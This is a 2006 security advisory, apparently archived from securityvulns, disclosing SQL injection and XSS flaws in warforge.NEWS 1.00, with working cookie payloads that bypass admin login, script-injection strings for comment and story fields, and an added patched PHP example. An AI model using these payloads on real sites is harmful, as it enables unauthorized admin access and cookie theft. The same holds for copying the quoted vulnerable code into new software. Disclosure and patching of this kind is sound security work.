warforge.NEWS

2006-04-27T00:00:00
ID SECURITYVULNS:DOC:12439
Type securityvulns
Reporter Securityvulns
Modified 2006-04-27T00:00:00

Description

warforge.NEWS exploit; I've pasted it on: http://forum.zone-h.org/viewtopic.php?t=5468



  • warforge.NEWS <=1.00 Multiple Vulnerabilities - -= http://colander.altervista.org/ =-

-= warforge.NEWS =-

yamcho April 26, 2006

Vulnerability(s):

SQL Injection, XSS

Product:

warforge.NEWS 1.00

Vendor:

http://www.thewarforge.com/

Description of product:

warforge.NEWS is a script designed for easy use/implementation. It has a full featured administration section and is powered by a mysql database.

Vulnerability / Exploit:

SQL Injection

In the file authcheck.php there is a flaw that can allow a user to log in as Admin.

The code is:

[...]

if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) {
    // This checks to make sure the username and password in the cookie are actual users,
    // this checks everytime you load a page to prevent cookie spoofing
    $usern = $_COOKIE["authusername"];
    $pass = $_COOKIE["authpassword"];
    mysql_connect($db_Host, $db_Username, $db_Pass);
    mysql_select_db($db_Database);
    $cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username = '$usern' AND password = '$pass'");

[...]

So, if a remote user adds these cookies to his cookie list:

1) authusername=ADMINUSERNAME'/*; authpassword=null; authfirst_name=null; authlast_name=null; authaccess=null; authemail=null;

or this:

2) authusername=null; authpassword=' OR '1'='1; authfirst_name=null; authlast_name=null; authaccess=null; authemail=null;

The resulting query will be:

1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND password = '$pass'

2) SELECT * FROM $usertable WHERE username = '$usern' AND password = '' OR '1'='1'

The remote user is now logged in as Admin.

XSS

In the file news.php there is a flaw that can allow a user to make an XSS attack.

The code is:

[...]

if(isset($_GET["newcomment"]) == "yes") {
    // This is where it processes the mysql to add a new comment
    $name = $_POST["name"];
    $email = $_POST["email"];
    $title = $_POST["title"];
    $comment = $_POST["comment"];

[...]

Some of these fields can be used to make an XSS attack.

So, if a remote user enters this

><script>alert(document.cookies);</script>

into the 'Your Name', 'Title' and 'Comment' form fields, he can obtain data.

In the file newsadd.php there is a flaw that can allow a logged-in user to make an XSS attack.

The code is:

[...]

if(isset($_POST["addstory"]) == "1") {
    // add the news post error checking blah blah
    $title = $_POST["title"];
    $author = $_COOKIE["authusername"];
    $email = $_COOKIE["authemail"];
    $newspost = $_POST["newspost"];

[...]

Some of these fields can be used to make an XSS attack.

So, if a remote user enters this

<script>alert(document.coockies);</script>

into the 'Title' and/or 'Story' form fields, he can obtain data.
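As an added example, not code from the advisory or from warforge.NEWS, the authcheck.php cookie lookup and the news.php / newsadd.php output rewritten to close both the SQL injection and the XSS above. It assumes a mysqli connection with mysqlnd (for get_result()) and a users table whose password column holds password_hash() digests; the function names are hypothetical.

```php
<?php
// Added example, not warforge.NEWS code. Assumes: a mysqli connection with mysqlnd
// (for get_result()), and a users table whose `password` column stores password_hash()
// digests rather than the cleartext the original keeps in the authpassword cookie.
declare(strict_types=1);

// Replacement for the authcheck.php lookup. The username is bound as a parameter, so
// authusername=ADMINUSERNAME'/* is compared literally and never reaches the SQL parser
// as syntax. $usertable is still interpolated and must come from configuration only.
function auth_user(mysqli $db, string $usertable, string $usern, string $pass): bool
{
    $stmt = $db->prepare("SELECT password FROM `$usertable` WHERE username = ? LIMIT 1");
    $stmt->bind_param('s', $usern);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    // Timing-safe comparison against the stored digest; no row means no user.
    return $row !== null && password_verify($pass, (string) $row['password']);
}

// After a successful login the identity is kept server-side; the browser only holds an
// opaque session id, so there is no password cookie to tamper with on later page loads.
function login(mysqli $db, string $usertable, string $usern, string $pass): bool
{
    if (!auth_user($db, $usertable, $usern, $pass)) {
        return false;
    }
    session_start();
    session_regenerate_id(true);
    $_SESSION['username'] = $usern;
    return true;
}

// Per-page check that replaces reading $_COOKIE["authusername"] / ["authpassword"].
function current_user(): ?string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    return isset($_SESSION['username']) ? (string) $_SESSION['username'] : null;
}

// Output escaping for the news.php / newsadd.php fields (name, title, comment, story):
// a submitted <script> tag is rendered as text instead of being executed.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
// e.g. echo '<h3>' . h($title) . '</h3><p>' . h($comment) . '</p>';
```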

Credits:

yamcho yamcho[at]email[dot]it
